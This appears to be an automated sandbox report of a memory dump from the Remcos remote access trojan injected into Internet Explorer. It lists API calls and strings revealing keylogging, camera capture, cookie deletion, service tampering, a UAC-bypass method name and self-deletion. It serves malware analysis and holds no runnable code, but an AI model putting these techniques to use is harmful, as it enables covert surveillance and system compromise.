              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
              • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
              • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
              • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
              APIs
              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
              • CloseHandle.KERNEL32(00000000), ref: 0041C459
              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
              • CloseHandle.KERNEL32(00000000), ref: 0041C477
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseHandle$CreatePointerWrite
              • String ID: hpF
              • API String ID: 1852769593-151379673
              • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
              • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
              • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
              • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
              APIs
                • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
              • _free.LIBCMT ref: 00450F48
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00450F53
              • _free.LIBCMT ref: 00450F5E
              • _free.LIBCMT ref: 00450FB2
              • _free.LIBCMT ref: 00450FBD
              • _free.LIBCMT ref: 00450FC8
              • _free.LIBCMT ref: 00450FD3
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
              • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
              • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
              • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
              • int.LIBCPMT ref: 00411183
                • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
              • std::_Facet_Register.LIBCPMT ref: 004111C3
              • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
              • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
              • String ID: (mG
              • API String ID: 2536120697-4059303827
              • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
              • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
              • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
              • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
              APIs
                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
              • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseCurrentOpenProcessQueryValue
              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
              • API String ID: 1866151309-2070987746
              • Opcode ID: 7d4a75d6e9c0c440b6b53ea08c59a84f07c2734ef3bd7f093c168f75871beb16
              • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
              • Opcode Fuzzy Hash: 7d4a75d6e9c0c440b6b53ea08c59a84f07c2734ef3bd7f093c168f75871beb16
              • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
              APIs
              • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
              • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
              • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
              • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
              • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
              APIs
              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Program Files (x86)\Internet Explorer\iexplore.exe), ref: 004075D0
                • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
              • CoUninitialize.OLE32 ref: 00407629
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: InitializeObjectUninitialize_wcslen
              • String ID: C:\Program Files (x86)\Internet Explorer\iexplore.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
              • API String ID: 3851391207-2922778296
              • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
              • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
              • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
              • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
              APIs
              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
              • GetLastError.KERNEL32 ref: 0040BAE7
              Strings
              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
              • [Chrome Cookies not found], xrefs: 0040BB01
              • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
              • UserProfile, xrefs: 0040BAAD
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: DeleteErrorFileLast
              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
              • API String ID: 2018770650-304995407
              • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
              • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
              • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
              • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
              APIs
              • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
              • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Console$AllocOutputShowWindow
              • String ID: Remcos v$5.0.0 Pro$CONOUT$
              • API String ID: 2425139147-2278869229
              • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
              • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
              • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
              • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
              • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: @"a/$CorExitProcess$mscoree.dll
              • API String ID: 4061214504-2188442305
              • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
              • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
              • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
              • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
              APIs
              • __allrem.LIBCMT ref: 0043AC69
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
              • __allrem.LIBCMT ref: 0043AC9C
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
              • __allrem.LIBCMT ref: 0043ACD1
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
              • String ID:
              • API String ID: 1992179935-0
              • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
              • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
              • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
              • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
              APIs
              • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: H_prologSleep
              • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
              • API String ID: 3469354165-3054508432
              • Opcode ID: 6f157006139ccf4b8d86a432b5633ede6fd06edeca8eb9c0ae1caa95c8564102
              • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
              • Opcode Fuzzy Hash: 6f157006139ccf4b8d86a432b5633ede6fd06edeca8eb9c0ae1caa95c8564102
              • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
              APIs
                • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
              • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
              • String ID:
              • API String ID: 3950776272-0
              • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
              • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
              • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
              • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: __cftoe
              • String ID:
              • API String ID: 4189289331-0
              • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
              • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
              • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
              • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ChangeConfigManager
              • String ID:
              • API String ID: 493672254-0
              • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
              • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
              • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
              • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
              APIs
              • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
              • _free.LIBCMT ref: 0044824C
              • _free.LIBCMT ref: 00448274
              • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
              • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
              • _abort.LIBCMT ref: 00448293
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
              • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
              • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
              • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              • API String ID: 221034970-0
              • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
              • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
              • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
              • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              • API String ID: 221034970-0
              • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
              • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
              • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
              • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              • API String ID: 221034970-0
              • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
              • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
              • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
              • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
              APIs
              • _strpbrk.LIBCMT ref: 0044E738
              • _free.LIBCMT ref: 0044E855
                • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
              • String ID: *?$.$@"a/
              • API String ID: 2812119850-1905327238
              • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
              • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
              • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
              • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
              APIs
              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
              • wsprintfW.USER32 ref: 0040B1F3
                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: EventLocalTimewsprintf
              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
              • API String ID: 1497725170-248792730
              • Opcode ID: e41d799f066c172bf4629150eb14c1c5e6a22ed7ca202d0bd35c19924fea2814
              • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
              • Opcode Fuzzy Hash: e41d799f066c172bf4629150eb14c1c5e6a22ed7ca202d0bd35c19924fea2814
              • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
              APIs
              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
              • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
              • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseCreateHandleSizeSleep
              • String ID: XQG
              • API String ID: 1958988193-3606453820
              • Opcode ID: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
              • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
              • Opcode Fuzzy Hash: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
              • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
              APIs
              • RegisterClassExA.USER32(00000030), ref: 0041D55B
              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
              • GetLastError.KERNEL32 ref: 0041D580
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ClassCreateErrorLastRegisterWindow
              • String ID: 0$MsgWindowClass
              • API String ID: 2877667751-2410386613
              • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
